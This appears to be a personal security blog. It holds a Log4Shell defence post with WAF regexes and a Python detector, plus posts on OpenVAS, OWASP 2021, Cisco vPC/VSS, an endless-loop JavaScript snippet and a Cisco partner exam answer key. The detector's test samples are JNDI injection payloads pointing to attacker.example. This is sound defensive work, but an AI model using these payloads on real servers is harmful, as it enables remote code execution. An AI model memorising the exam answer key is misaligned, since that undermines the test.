
whaust

Monday, December 13, 2021

Log4j - CVE-2021-44228 - Apache Log4j RCE Attack Flow

Defence:

WAF rules (regular expressions matched against request headers, parameters and bodies):

\$\s*\{\s*jndi\s*:\s*(ldap|ldaps|rmi|iiop|iiopname|corbaname|dns|nis):

\$\{(j|jn|jnd|jndi|jndi:|jndi:[ldaprmi]{1,4})?\$\{

\$\{(lower|upper)?\:[:-]{1,2}[jndirmiladap]{1,4}\}

The first rule matches the plain ${jndi:<scheme>: form. The second and third exist for the obfuscated variants that nest lookups, such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}, which Log4j resolves recursively before the JNDI lookup runs and which the first rule never sees. Treat these signatures as a stopgap that buys time: further nesting can still get past them, so the real fix is upgrading Log4j to a fixed release (2.17.1 or later) or, where that is not yet possible, removing the JndiLookup class from the log4j-core jar.
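To see why the nested-lookup rules are needed, here is an added example (written for this page, not code from the original post or from any WAF vendor). It mimics Log4j's recursive lookup resolution for the lower, upper and ${key:-default} forms, checks for a surviving ${jndi: lookup in the normalized string, and compares that verdict with the first signature above on a few constructed request values. The attacker host names and the sample strings are made up for the demonstration.

```python
import re

# First-generation signature, equivalent to the first WAF rule above.
SIMPLE_RULE = re.compile(
    r"\$\s*\{\s*jndi\s*:\s*(ldap|ldaps|rmi|iiop|iiopname|corbaname|dns|nis):", re.I)

# An innermost Log4j lookup: ${...} whose body contains no further ${ or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# What we look for once the obfuscation layers have been peeled off.
JNDI_SINK = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve_innermost(m):
    """Resolve one innermost lookup the way Log4j's StrSubstitutor/Interpolator would.

    Only the lookups that matter for de-obfuscation are modelled: ${lower:x},
    ${upper:x} and the ${anything:-default} fallback. Every other prefix (env,
    sys, date, ...) is treated as unresolvable, so Log4j would use the default
    if one is given and otherwise leave the literal text in place.
    """
    body = m.group(1)
    if ":-" in body:                              # ':-' separates the default value
        var, _, default = body.partition(":-")
    else:
        var, default = body, None
    prefix, sep, key = var.partition(":")
    prefix = prefix.strip().lower()               # Log4j lower-cases the prefix
    if prefix == "jndi":
        return m.group(0)                         # the sink itself: keep it visible
    if sep and prefix == "lower":
        return key.lower()
    if sep and prefix == "upper":
        return key.upper()
    return default if default is not None else m.group(0)


def normalize_lookups(value, max_rounds=64):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve_innermost, value)
        if resolved == value:
            break
        value = resolved
    return value


def is_log4shell_attempt(value):
    """True when a ${jndi: lookup survives normalization."""
    return bool(JNDI_SINK.search(normalize_lookups(value)))


def compare_rules(value):
    """Verdict of the plain signature vs. the normalizing check."""
    return {"simple_rule": bool(SIMPLE_RULE.search(value)),
            "normalized": is_log4shell_attempt(value)}


# Constructed request values (User-Agent / header strings), not real traffic.
SAMPLES = [
    ("${jndi:ldap://attacker.example/a}", True),
    ("${jNdI:rmi://attacker.example/a}", True),
    ("${${lower:j}ndi:${lower:l}dap://attacker.example/a}", True),
    ("${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.example/a}", True),
    ("${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.example/a}", True),
    ("Mozilla/5.0 (X11; Linux x86_64) build=${date:yyyy-MM-dd}", False),
    ("curl/7.68.0 price=${price}", False),
]

if __name__ == "__main__":
    for value, expected in SAMPLES:
        verdict = compare_rules(value)
        print(f"{value!r:80} simple={verdict['simple_rule']!s:5} "
              f"normalized={verdict['normalized']!s:5} expected={expected}")
```

Running it shows the three obfuscated payloads being flagged only by the normalizing check, while the two benign strings containing unrelated ${...} text stay clean. The model is deliberately narrow (env, sys and date lookups are only followed to their :-default), so it is a detection aid for triage and log review, not a substitute for patching.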



Thursday, September 16, 2021

Installing OpenVAS

## Install OpenVAS

apt-get install openvas  # install OpenVAS

openvas-setup  # sets up the environment automatically: generates the certificates and downloads the feed (NVT definitions)

openvas-check-setup  # verify the installation

openvasmd --create-user admin1  # create an account

openvasmd --user=admin1 --new-password=openvas  # set the password (replace "openvas" with a strong one; the scanner UI is a high-value target)

openvas-feed-update  # update the feeds

openvas-stop

openvasmd --rebuild

openvas-start

netstat -tlnp  # confirm that ports 9390 and 9392 are in LISTEN state

https://127.0.0.1:9392  (open a browser on Kali and enter the IP to reach the web interface)


Change the timezone

sudo dpkg-reconfigure tzdata


PS. The following commands have to be run after every reboot (an OpenVAS bug):

openvas-stop

openvasmd --rebuild

openvas-start

Monday, September 13, 2021

Kali Linux Installation 2021/09/11

1. Install Kali Linux on a Mac with VMware Workstation

 https://www.kali.org/get-kali/#kali-virtual-machines


After extracting the archive: Kali-Linux-2021.2-vmware-amd64.vmwarevm


Friday, September 10, 2021

OWASP 2021 Quick View

OWASP Top 10 2021 introduces three new categories:

A04:2021 - Insecure Design (No. 4)

A08:2021 - Software and Data Integrity Failures (No. 8)

A10:2021 - Server-Side Request Forgery (No. 10)



A01:2021 - Broken Access Control

The OWASP team moved Broken Access Control from fifth place on the 2017 list to first. 94% of the applications tested showed some form of broken access control, and 34 CWEs are mapped to this category.

A02:2021 - Cryptographic Failures

Cryptographic Failures moves up to second place. It was third on the 2017 list under the name Sensitive Data Exposure, which described a symptom rather than a cause. Because the 2021 list focuses on root causes, the category is now named for the cryptographic failures that lead to sensitive data exposure.

A03:2021 - Injection

Injection drops from first place on the 2017 list to third in the 2021 Top 10. 33 CWEs are mapped to this category, and it now includes Cross-Site Scripting (XSS), which was seventh on the previous list.

A04:2021 - Insecure Design

Insecure Design is a new category in the 2021 Top 10, listed fourth. It covers risks arising from design flaws and missing security controls, as distinct from bugs in the implementation.

A05:2021 - Security Misconfiguration

Security Misconfiguration moves from sixth to fifth; 90% of the applications were tested for some form of misconfiguration. The former A4:2017 category, XML External Entities (XXE), has been folded into this one.

A06:2021 - Vulnerable and Outdated Components

This is the new title for "Using Components with Known Vulnerabilities", which was ninth on the 2017 list; it moves up to sixth. It is the only category with no CVEs mapped to its CWEs, so default exploit and impact weights of 5.0 are factored into its score.

A07:2021 - Identification and Authentication Failures

Previously called Broken Authentication, it slides from second to seventh. It remains part of the Top 10, but the increased availability of standardized frameworks seems to be helping.

A08:2021 - Software and Data Integrity Failures

Software and Data Integrity Failures is a new category in the 2021 Top 10. It covers trusting software updates, critical data and CI/CD pipelines without verifying their integrity. The 2017 category Insecure Deserialization has been merged into it.

A09:2021 - Security Logging and Monitoring Failures

Previously called Insufficient Logging & Monitoring, it moves from tenth to ninth. Failures here hurt visibility, incident alerting and forensics.

A10:2021 - Server-Side Request Forgery

SSRF was added from the community survey at tenth place. The data shows a relatively low incidence rate, above-average testing coverage, and above-average ratings for exploit and impact potential.
Cheers!


Wednesday, August 18, 2021

Feature comparison: Cisco vPC and Cisco VSS

 Today your old man is going to talk about two technologies: Cisco vPC (Virtual Port Channel) and VSS (Virtual Switching System). They work differently and each has its own place. You don't have to keep Googling; I'll lay out the real differences between them right here, so you're getting a good deal.

Cisco vPC runs on Nexus devices; Cisco VSS runs on Cisco Catalyst switches. They are different technologies for different scenarios.

  • What is VSS and how does it work?
  • What is the difference between VSS and a port channel?
  • Is vPC an advanced version of port-channel technology?
  • How do we tell vPC and VSS apart?
  • Where should vPC be used, and where VSS?
  • Is there any command to enable vPC on a Cisco 6500 chassis?
  • Can vPC and VSS be used on the same switch?
  • Can we choose to use VSS on Cisco 3850 or Cisco 2960-X switches?

Cisco VSS: Virtual Switching System

Cisco VSS combines a pair of Catalyst 4500/6500/6800 series switches into a single network element. VSS manages the redundant links, which externally act as a single port channel. It simplifies network configuration and operation by reducing the number of Layer 3 routing neighbors and providing a loop-free Layer 2 topology.

So it is clear that VSS cannot be used on access switches unless the network uses Cisco 6500, 6800 or 4500 switches. All three platforms are normally deployed in the distribution or core layer, and VSS is generally used in the distribution layer of an enterprise network.

Below is what VSS looks like in an enterprise network architecture. Make sure these are Cisco Catalyst switches, which can be Cisco 4500/6500 and 6800 switches.

Figure 1.1 - Cisco VSS physical topology and logical topology

Your old man does not recommend using this high-end gear in a distribution architecture with very low network requirements.

Cisco vPC: Virtual Port Channel

A virtual Port Channel (vPC) allows links that are physically connected to two different Cisco Nexus 5000/7000 series devices to appear as a single port channel to a third device, such as a Fabric Extender (FEX), i.e. a Nexus 2000 switch.

vPC provides Layer 2 multipathing, which lets you create redundancy through increased bandwidth, enable multiple parallel paths between nodes, and load-balance traffic where alternative paths exist. A vPC domain includes the vPC peer devices, the vPC peer-keepalive link, the vPC peer link, and all the port channels in the vPC domain that connect to downstream devices.

Figure 1.2 - Cisco vPC

Cisco vPC technology is used only on Cisco Nexus devices; it is not available on Cisco Catalyst or Cisco access-layer switches, and these features cannot be used on a Cisco 3850. It was built primarily for Cisco Nexus switches.

Figure 1.3 - Comparison of VSS and vPC

Got it now?

  • -- 2021-08-18



Tuesday, August 17, 2021

Mysterious Code

 // Dispatches a synthetic Ctrl+G keydown to the document 100 times per timer tick, forever.
 // Synthetic events are untrusted (isTrusted === false), so the browser's own Ctrl+G
 // shortcut does not fire; only the page's keydown listeners see them.
 var event = new KeyboardEvent('keydown', { key: 'g', ctrlKey: true });
 setInterval(function () {
   for (var i = 0; i < 100; i++) { document.dispatchEvent(event); }
 }, 0);

Friday, June 4, 2021

Wednesday, June 2, 2021

Taiwan Space Law

Space has become a new arena of global competition in the 21st century; established space powers and emerging space nations alike are pouring large resources into space development. After nearly 30 years of development, Taiwan has laid a solid foundation of infrastructure and technical capability. In her inaugural address on May 20, 2020 (year 109 of the ROC calendar), President Tsai named the space industry one of the six core strategic industries. With government policy guidance, resource investment, and a complete legal and support framework, Taiwan can certainly become an important member of the emerging space nations, making space a significant force in support of national security, economic development, public welfare and technological progress.


Tuesday, March 16, 2021

# (Pass_1005) Red Belt Partner Academy Security Powered by Fire Jumper - Presales - Stage 1 FY21 (Partners Only)


* Q. The Cisco Security Platform reduces complexity and strengthens operations by:

Streamlining policy and device updates

Enabling frictionless, secure access for users

Cooperating with an existing architecture

(O) All of the above

* Q. Pick the right Zero-Trust Strategy components from the following. [Choose one answer]

Workplace: Network Access

Workforce: User and device access

Workload: Application and workload access

(O) All of the above

* Q. What should you do if a customer wants to discover which applications are being used in their environment and what is communicating with their apps/data?

Demo Duo Beyond

Qualify out, tell them there isn’t a Cisco product

Conduct additional discovery on how the organization handles it today

(O) Work with your CSS to evaluate and introduce them to the Tetration team

* Q. How do customers receive Talos threat intelligence?

Purchasing a Talos subscription for their security product

Purchasing a Talos Enterprise License Subscription

Purchasing the Talos Threat Feed

(O) Cisco security products receive Talos threat intelligence for free

* Q. Which Service is a good fit for medium sized customers?

(X) ISE Implementation Service

Incident Response Retainer

(O) Segmentation Advisory Service

* Q. Cisco Security takes you from overwhelmed to empowered. Our simplified platform helps you reduce complexity and strengthen operational efficiency. So your teams can stop swiveling between products and interfaces and get time back to focus on what matters most, and make it easier for your people and your solutions to work as a team. (True or False)

(O) True

False

* Q. Which is an example of a supply chain attack?

DNSMessenger

Sea Turtle

(O) Nyetya

VPNFilter

* Q. When was Talos acquired by Cisco?

2015

2017

(X) 2012

(O) Talos is not an acquisition

* Q. SAFE is:

A repository of validated and referenced Cisco designs

A design methodology for Security Architects

A method to align security, networking, and business outcome

(O) All of the above

* Q. What does the Presenter in the "Security EBC - Video " try to say, by referring to “Isn’t it time for Security solutions to act as a team?” [Choose one answer]

Create new advanced Security solutions

Create strong Perimeter Security Solutions

Create Strong Endpoint Security Solutions

(O) Security solutions need to work together as a unit, e.g. endpoint security working with cloud security, perimeter security, MFA and so on.

* Q. How does Cisco’s Zero Trust approach reduce the business’s risks? Select the best three answers.

Securing the workforce and workloads

(O) Ensuring compliance

(O) Gaining insight into the users and devices

(O) Establishing device trust before granting access to applications

* Q. What does the Cisco Security Platform provide to enable better outcomes to the business? Select the best three answers.

(O) A security strategy with a platform backed by unparalleled resources and expertise

(O) A powerful, pervasive platform with access to the latest security innovations

A closed platform that strengthens operations

(O) A platform with reduced complexity that gives security teams their time back

* Q. What is the best way to find and connect with the service seller for your account?

Look around on Sales Connect and Wiki Pages

(O) Look them up in the Account Team Directory

Send out an email to a services alias

* Q. Select the Key value proposition of Cisco Talos? [Choose any three answer]

(O) Elite group of Security Experts devoted to providing superior Protection to customers with our Products and services.

(O) Threat Intelligence & Interdiction, Detection Research, Engine Development, Vulnerability Research & Discovery, Open Source & Education, and Global Outreach.

(O) Cisco Talos’ core mission is to provide verifiable and customizable defensive technologies and techniques that help customers quickly protect their assets from cloud to core.

Talos is a Perimeter based security product from Cisco

* Q. Talos analyzes unmatched visibility every day and pushes immediately actionable intelligence to products. This coverage allows Cisco Security solutions to provide coverage at the earliest signs of a threat. (True or False)

(O) True

False

* Q. Umbrella acts as your secure onramp to the internet. DNS-layer security, Secure Web Gateway capabilities, and cloud-delivered firewall functionality create the first line of defense and inspection for any traffic, so wherever your users are or whatever they're connecting to, their access is secure. Once the traffic reaches the SIG cloud platform, you can easily implement different types of inspection and policy enforcement. (True or False)

(O) True

False

* Q. What makes Cisco Security stand apart in the market? [Choose three answers]

(O) Open and integrated platform

(O) Cloud-delivered Simplicity

(O) Deep Network integration

Provides solid protection for User and Device access

* Q. Which persona will procure solutions with names like private, public, and hybrid?

(O) Cloud Buyer

Endpoint Admin

Email Admin

Network Buyer

* Q. The acronym SAFE stands for:

(X) Secure Architecture For the Enterprise

Sell All Feature Enhancements

Security Additions For Enablement

(O) It’s not an acronym, it’s just a name

* Q. Which role would benefit most from a platform that provides anti-virus, anti-spam, outbreak filters, and macro detection?

(O) Email Admin

Cloud Buyer

SecOps Manager

CISO

* Q. Which actions should you take to qualify an opportunity prior to engaging CX? Select the best three answers.

(O) Find out customer’s timeline

(O) Find out customer’s budget

(O) Determine customer’s needs and pain points

Schedule a demo

* Q. Which Service Buckets map best to Enterprise/Large Customers? Select the best three answers.

(O) Advisory

(O) Implementation

Product Training

(O) Business Critical Services

* Q. SAFE, is a vendor agnostic conversation and design process that uniquely positions Cisco as a larger security solution provider.

(O) True

False

Q. Effective cyber risk management is undermined by the proliferation of new vendor solutions and integration challenges of security applications.

(O) True

False

Q. Which role is primarily concerned with accelerating security operations, blocking more, and focusing on compliance goals?

(O) CISO

SecOps Manager

Email Admin

Security Architect

Q. SAFE can be used when designing security into both new and existing networks.

(O) True

False

Q. Define Zero Trust Approach. [Pick 3 answers]

(O) Enable policy-based controls for every access request in a corporate environment

(O) See who and what is accessing applications, workloads & the network

(O) Segment your network & workloads by enforcing granular controls

Focus on providing protection to end user

* Q. What are the key characteristics of “Cisco Security Platform”?(Choose 3)

(O) Best of breed products

(O) Trust verification

(O) Talos threat intelligence

NAC Solution

Integration of NGFW with ISE

Q. The Key to SAFE is built around which TWO areas:

(O) Operational Domains

Reference documentation on how to secure networks

(O) Practices for securing the business

Places in the Network

* Q. The Cisco Security ecosystem covers email, networks, cloud, web, endpoints, and everything in between. Cisco Talos has more visibility than any other security vendor in the world, with the sheer size and breadth of Cisco Security's portfolio and the incoming telemetry from Cisco's customers and products. (True or False)

(O) True

False

Q. Which of the following is described as best of breed products, protecting the network, endpoint, applications, and cloud?

(O) Cisco Security Platform

Talos

Cisco Threat Response

Stealthwatch

Q. Which question can you ask to learn more about protecting a customer’s workforce?

(O) How do you know your users are who they say they are?

(X) How can you view and secure all connections?

What’s on the network?

How do you segment your network today?

* Q. Which of the following are common challenges seen by all prospect personas? Select the best three answers.

(O) Time

(O) Expertise

(O) Evidence

Efficacy

* Q. Select some of the key primary concerns of CISO’s in the organization?

Driving metrics

Cost of security

Attracting and retaining top talent

Offensive security

(O) All of the above

* Q. How does Cisco Duo secure the workforce?

By providing valuable information on threats facing the market

By discovering what applications are being used in the environment

By assessing threats to websites that employees visit

(O) By verifying the identity of users and the health of their devices before connecting to the applications they need

* Q. SAFE allows me to:

Design networks with my customer’s outcome in mind

Sell more security because we understand how customers need security to be implemented

Brings the different business and technology owners into a joint conversation on security

(O) All of the Above

* Q. Pick the right combination of Product or solution mapping with respect to Cisco Zero Trust. [Pick Three answer]

(O) Secure the Workforce With AMP

(O) Secure the Workforce With Duo

Secure Your Workloads With ACI

Secure Your Workloads With Tetration

(X) Secure the Workplace With Software-Defined Access

(O) Secure the Workplace With ISE

* Q. With powerful integrations and industry-leading solutions, the Cisco Security Platform simplifies your security experience, accelerates your success, and protects your future. (True or False)

(O) True

False
